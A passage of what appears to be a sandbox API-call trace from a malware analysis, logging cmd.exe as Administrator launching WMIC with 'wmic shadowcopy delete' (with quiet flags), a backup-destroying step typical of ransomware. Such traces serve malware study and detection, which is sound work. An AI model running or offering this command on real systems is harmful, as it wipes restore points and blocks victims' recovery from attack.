(_FileHandle=0) returned 0xa4 [0115.982] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.982] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0115.982] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e34c, cchWideChar=1 | out: lpWideCharStr="\n-quiet\nquiet\n") returned 1 [0115.982] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.982] GetFileType (hFile=0xa4) returned 0x3 [0115.982] _get_osfhandle (_FileHandle=0) returned 0xa4 [0115.982] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.983] _get_osfhandle (_FileHandle=1) returned 0x10c [0115.983] GetFileType (hFile=0x10c) returned 0x3 [0115.983] _get_osfhandle (_FileHandle=1) returned 0x10c [0115.983] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="wmic shadowcopy delete\n", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wmic shadowcopy delete\n", lpUsedDefaultChar=0x0) returned 24 [0115.983] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x2cf538, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf538*=0x17, lpOverlapped=0x0) returned 1 [0115.983] GetProcessHeap () returned 0x3e0000 [0115.983] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x4012) returned 0x3ff630 [0115.983] GetProcessHeap () returned 0x3e0000 [0115.983] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ff630 | out: hHeap=0x3e0000) returned 1 [0115.983] GetProcessHeap () returned 0x3e0000 [0115.983] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0) returned 0x3f97e0 [0115.983] GetProcessHeap () returned 0x3e0000 [0115.983] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f4610 [0115.984] GetProcessHeap () returned 0x3e0000 [0115.984] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x36) returned 0x3f6510 [0115.984] GetConsoleOutputCP () returned 0x1b5 [0115.984] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f6bfe0 | out: lpCPInfo=0x49f6bfe0) returned 1 [0115.984] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0115.984] GetConsoleTitleW (in: lpConsoleTitle=0x2cf4f0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0115.985] GetProcessHeap () returned 0x3e0000 [0115.985] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x218) returned 0x3e1ab0 [0115.985] GetProcessHeap () returned 0x3e0000 [0115.985] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x40) returned 0x3faa40 [0115.985] GetProcessHeap () returned 0x3e0000 [0115.985] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x420) returned 0x3fba10 [0115.985] SetErrorMode (uMode=0x0) returned 0x1 [0115.985] SetErrorMode (uMode=0x1) returned 0x0 [0115.985] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3fba20, lpFilePart=0x2ced80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ced80*="Desktop") returned 0x25 [0115.985] SetErrorMode (uMode=0x1) returned 0x1 [0115.985] GetProcessHeap () returned 0x3e0000 [0115.985] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3fba10, Size=0x66) returned 0x3fba10 [0115.985] GetProcessHeap () returned 0x3e0000 [0115.985] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3fba10) returned 0x66 [0115.985] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0115.985] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0115.985] GetProcessHeap () returned 0x3e0000 [0115.985] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x128) returned 0x3e1cd0 [0115.985] GetProcessHeap () returned 0x3e0000 [0115.985] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x240) returned 0x3f9910 [0115.986] GetProcessHeap () returned 0x3e0000 [0115.986] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f9910, Size=0x12a) returned 0x3f9910 [0115.986] GetProcessHeap () returned 0x3e0000 [0115.986] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f9910) returned 0x12a [0115.986] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0115.986] GetProcessHeap () returned 0x3e0000 [0115.986] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe8) returned 0x3f5b70 [0115.986] GetProcessHeap () returned 0x3e0000 [0115.986] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f5b70, Size=0x7e) returned 0x3f5b70 [0115.986] GetProcessHeap () returned 0x3e0000 [0115.986] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5b70) returned 0x7e [0115.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.986] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0xffffffffffffffff [0115.986] GetLastError () returned 0x2 [0115.986] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wmic", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0xffffffffffffffff [0115.987] GetLastError () returned 0x2 [0115.987] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.987] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0xffffffffffffffff [0115.987] GetLastError () returned 0x2 [0115.987] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0xffffffffffffffff [0115.987] GetLastError () returned 0x2 [0115.987] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.987] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0xffffffffffffffff [0115.987] GetLastError () returned 0x2 [0115.987] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0xffffffffffffffff [0115.988] GetLastError () returned 0x2 [0115.988] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.988] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0x3f9f20 [0115.988] FindClose (in: hFindFile=0x3f9f20 | out: hFindFile=0x3f9f20) returned 1 [0115.988] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0xffffffffffffffff [0115.988] GetLastError () returned 0x2 [0115.988] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ceaf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceaf0) returned 0x3f9f20 [0115.988] FindClose (in: hFindFile=0x3f9f20 | out: hFindFile=0x3f9f20) returned 1 [0115.989] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0115.989] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0115.989] GetConsoleTitleW (in: lpConsoleTitle=0x2cf040, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0115.989] GetProcessHeap () returned 0x3e0000 [0115.989] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x21c) returned 0x3f9a50 [0115.989] GetConsoleTitleW (in: lpConsoleTitle=0x3f9a60, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0115.989] GetProcessHeap () returned 0x3e0000 [0115.989] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f9a50, Size=0xa6) returned 0x3f9a50 [0115.989] GetProcessHeap () returned 0x3e0000 [0115.989] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f9a50) returned 0xa6 [0115.989] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - wmic shadowcopy delete") returned 1 [0115.990] GetProcessHeap () returned 0x3e0000 [0115.990] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9a50 | out: hHeap=0x3e0000) returned 1 [0115.990] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cedf8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cedb8 | out: lpAttributeList=0x2cedf8, lpSize=0x2cedb8) returned 1 [0115.990] UpdateProcThreadAttribute (in: lpAttributeList=0x2cedf8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ceda8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cedf8, lpPreviousValue=0x0) returned 1 [0115.990] GetStartupInfoW (in: lpStartupInfo=0x2cef10 | out: lpStartupInfo=0x2cef10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xa4, hStdOutput=0x10c, hStdError=0x10c)) [0115.990] GetProcessHeap () returned 0x3e0000 [0115.990] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x20) returned 0x3f4640 [0115.990] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0115.990] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0115.990] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0115.990] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0115.990] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0115.990] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0115.990] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0115.990] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0115.991] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0115.992] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0115.992] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0115.992] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0115.992] GetProcessHeap () returned 0x3e0000 [0115.992] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4640 | out: hHeap=0x3e0000) returned 1 [0115.992] GetProcessHeap () returned 0x3e0000 [0115.992] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x12) returned 0x3f8900 [0115.992] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic shadowcopy delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2cee30*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic shadowcopy delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cede0 | out: lpCommandLine="wmic shadowcopy delete", lpProcessInformation=0x2cede0*(hProcess=0x54, hThread=0x50, dwProcessId=0x208, dwThreadId=0x6d8)) returned 1 [0116.006] CloseHandle (hObject=0x50) returned 1 [0116.006] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0116.006] GetProcessHeap () returned 0x3e0000 [0116.006] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3feb10 | out: hHeap=0x3e0000) returned 1 [0116.006] GetEnvironmentStringsW () returned 0x3f8980* [0116.006] GetProcessHeap () returned 0x3e0000 [0116.006] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0e) returned 0x3feb10 [0116.006] FreeEnvironmentStringsW (penv=0x3f8980) returned 1 [0116.006] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x2ce6e8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x2ce6e8, ReturnLength=0x0) returned 0x0 [0116.006] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdf000, lpBuffer=0x2ce720, nSize=0x380, lpNumberOfBytesRead=0x2ce6e0 | out: lpBuffer=0x2ce720*, lpNumberOfBytesRead=0x2ce6e0*=0x380) returned 1 [0116.007] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0127.143] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2ced28 | out: lpExitCode=0x2ced28*=0x0) returned 1 [0127.143] CloseHandle (hObject=0x54) returned 1 [0127.143] _vsnwprintf (in: _Buffer=0x2cef98, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ced38 | out: _Buffer="00000000") returned 8 [0127.143] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0127.143] GetProcessHeap () returned 0x3e0000 [0127.143] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3feb10 | out: hHeap=0x3e0000) returned 1 [0127.143] GetEnvironmentStringsW () returned 0x3f8980* [0127.143] GetProcessHeap () returned 0x3e0000 [0127.144] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0e) returned 0x3feb10 [0127.144] FreeEnvironmentStringsW (penv=0x3f8980) returned 1 [0127.144] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0127.144] GetProcessHeap () returned 0x3e0000 [0127.144] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3feb10 | out: hHeap=0x3e0000) returned 1 [0127.144] GetEnvironmentStringsW () returned 0x3f8980* [0127.144] GetProcessHeap () returned 0x3e0000 [0127.144] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0e) returned 0x3feb10 [0127.144] FreeEnvironmentStringsW (penv=0x3f8980) returned 1 [0127.144] GetProcessHeap () returned 0x3e0000 [0127.144] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8900 | out: hHeap=0x3e0000) returned 1 [0127.144] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cedf8 | out: lpAttributeList=0x2cedf8) [0127.144] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x10c [0127.145] SetConsoleMode (hConsoleHandle=0x10c, dwMode=0x0) returned 0 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x10c [0127.146] GetConsoleMode (in: hConsoleHandle=0x10c, lpMode=0x49f5e194 | out: lpMode=0x49f5e194) returned 0 [0127.146] _get_osfhandle (_FileHandle=0) returned 0xa4 [0127.146] GetConsoleMode (in: hConsoleHandle=0xa4, lpMode=0x49f5e198 | out: lpMode=0x49f5e198) returned 0 [0127.146] GetConsoleOutputCP () returned 0x1b5 [0127.146] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f6bfe0 | out: lpCPInfo=0x49f6bfe0) returned 1 [0127.146] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0127.146] GetProcessHeap () returned 0x3e0000 [0127.146] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5b70 | out: hHeap=0x3e0000) returned 1 [0127.146] GetProcessHeap () returned 0x3e0000 [0127.147] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9910 | out: hHeap=0x3e0000) returned 1 [0127.147] GetProcessHeap () returned 0x3e0000 [0127.147] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1cd0 | out: hHeap=0x3e0000) returned 1 [0127.147] GetProcessHeap () returned 0x3e0000 [0127.147] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fba10 | out: hHeap=0x3e0000) returned 1 [0127.147] GetProcessHeap () returned 0x3e0000 [0127.147] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3faa40 | out: hHeap=0x3e0000) returned 1 [0127.147] GetProcessHeap () returned 0x3e0000 [0127.147] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1ab0 | out: hHeap=0x3e0000) returned 1 [0127.147] GetProcessHeap () returned 0x3e0000 [0127.147] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6510 | out: hHeap=0x3e0000) returned 1 [0127.147] GetProcessHeap () returned 0x3e0000 [0127.147] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4610 | out: hHeap=0x3e0000) returned 1 [0127.147] GetProcessHeap () returned 0x3e0000 [0127.147] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f97e0 | out: hHeap=0x3e0000) returned 1 [0127.147] _vsnwprintf (in: _Buffer=0x49f76340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf258 | out: _Buffer="\r\n") returned 2 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x10c [0127.147] GetFileType (hFile=0x10c) returned 0x3 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x10c [0127.147] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0127.148] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf228, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf228*=0x2, lpOverlapped=0x0) returned 1 [0127.148] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f5f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0127.148] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f6c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0127.148] _vsnwprintf (in: _Buffer=0x49f5eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cf268 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0127.148] _vsnwprintf (in: _Buffer=0x49f5ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cf268 | out: _Buffer=">") returned 1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x10c [0127.148] GetFileType (hFile=0x10c) returned 0x3 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x10c [0127.148] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x49f6c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0127.148] WriteFile (in: hFile=0x10c, lpBuffer=0x49f6c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2cf258, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesWritten=0x2cf258*=0x26, lpOverlapped=0x0) returned 1 [0127.148] _get_osfhandle (_FileHandle=0) returned 0xa4 [0127.148] GetFileType (hFile=0xa4) returned 0x3 [0127.148] _get_osfhandle (_FileHandle=0) returned 0xa4 [0127.148] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.149] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0127.149] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e320, cchWideChar=1 | out: lpWideCharStr="emic shadowcopy delete\n-quiet\nquiet\n") returned 1 [0127.149] _get_osfhandle (_FileHandle=0) returned 0xa4 [0127.149] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.149] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0127.149] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e322, cchWideChar=1 | out: lpWideCharStr="xic shadowcopy delete\n-quiet\nquiet\n") returned 1 [0127.149] _get_osfhandle (_FileHandle=0) returned 0xa4 [0127.149] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.149] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0127.149] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e324, cchWideChar=1 | out: lpWideCharStr="ic shadowcopy delete\n-quiet\nquiet\n") returned 1 [0127.149] _get_osfhandle (_FileHandle=0) returned 0xa4 [0127.149] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.149] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, lpOverlapped=0x0) returned 1 [0127.149] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49f6c320, cbMultiByte=1, lpWideCharStr=0x49f6e326, cchWideChar=1 | out: lpWideCharStr="t shadowcopy delete\n-quiet\nquiet\n") returned 1 [0127.149] _get_osfhandle (_FileHandle=0) returned 0xa4 [0127.149] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.149] ReadFile (in: hFile=0xa4, lpBuffer=0x49f6c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cf558, lpOverlapped=0x0 | out: lpBuffer=0x49f6c320*, lpNumberOfBytesRead=0x2cf558*=0x1, 